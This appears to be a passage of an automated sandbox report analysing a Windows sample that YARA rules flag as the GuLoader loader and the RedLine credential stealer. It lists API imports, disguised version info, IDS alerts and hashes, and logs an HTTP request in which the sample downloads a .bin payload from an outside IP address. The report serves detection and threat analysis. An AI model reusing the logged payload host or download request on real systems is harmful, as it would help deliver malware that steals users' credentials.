ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

Version Infos

Description | Data
LegalCopyright | Asilum
FileVersion | 1.2.3
CompanyName | Asilum company
LegalTrademarks | Asilum is a trademark of Asilum company
Comments | Asilum
ProductName | Asilum Application
FileDescription | Asilum Application
Translation | 0x0409 0x04b0

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
12/17/21-10:17:12.474954 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.4 | 8.8.8.8
12/17/21-10:18:00.248809 | TCP | 2018752 | ET TROJAN Generic .bin download from Dotted Quad | 49857 | 80 | 192.168.2.4 | 185.112.83.8

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP

HTTP Request Dependency Graph

• 185.112.83.8

HTTP Packets

Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
0           192.168.2.4  49857        185.112.83.8    80                C:\Users\user\Desktop\mixfive_20211216-221155.exe

Timestamp                            kBytes transferred  Direction  Data
Dec 17, 2021 10:18:00.248809099 CET  10556               OUT        GET /Allocation.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                    Host: 185.112.83.8
                                                                    Cache-Control: no-cache
Dec 17, 2021 10:18:00.303559065 CET  10557               IN         HTTP/1.1 200 OK
                                                                    Content-Type: application/octet-stream
                                                                    Last-Modified: Thu, 16 Dec 2021 20:39:39 GMT
                                                                    Accept-Ranges: bytes
                                                                    ETag: "7bfebfbbdf2d71:0"
                                                                    Server: Microsoft-IIS/10.0
                                                                    Date: Fri, 17 Dec 2021 09:17:57 GMT
                                                                    Content-Length: 190016


Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 10:15:44
Start date: 17/12/2021
Path: C:\Users\user\Desktop\mixfive_20211216-221155.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\mixfive_20211216-221155.exe"
Imagebase: 0x400000
File size: 94872 bytes
MD5 hash: 66E3C71BCD364EB5CF19CB820683EF0C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.816118549.00000000029A0000.00000040.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 10:16:56
Start date: 17/12/2021
Path: C:\Users\user\Desktop\mixfive_20211216-221155.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\mixfive_20211216-221155.exe"
Imagebase: 0x400000
File size: 94872 bytes
MD5 hash: 66E3C71BCD364EB5CF19CB820683EF0C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.1006545439.0000000020590000.00000004.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.1004805288.000000001E100000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000003.945608436.0000000000A3F000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000C.00000000.813287233.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.1006136622.000000001F477000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.1006896564.0000000020B60000.00000004.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.1005643076.000000001E7C1000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

Disassembly

Code Analysis
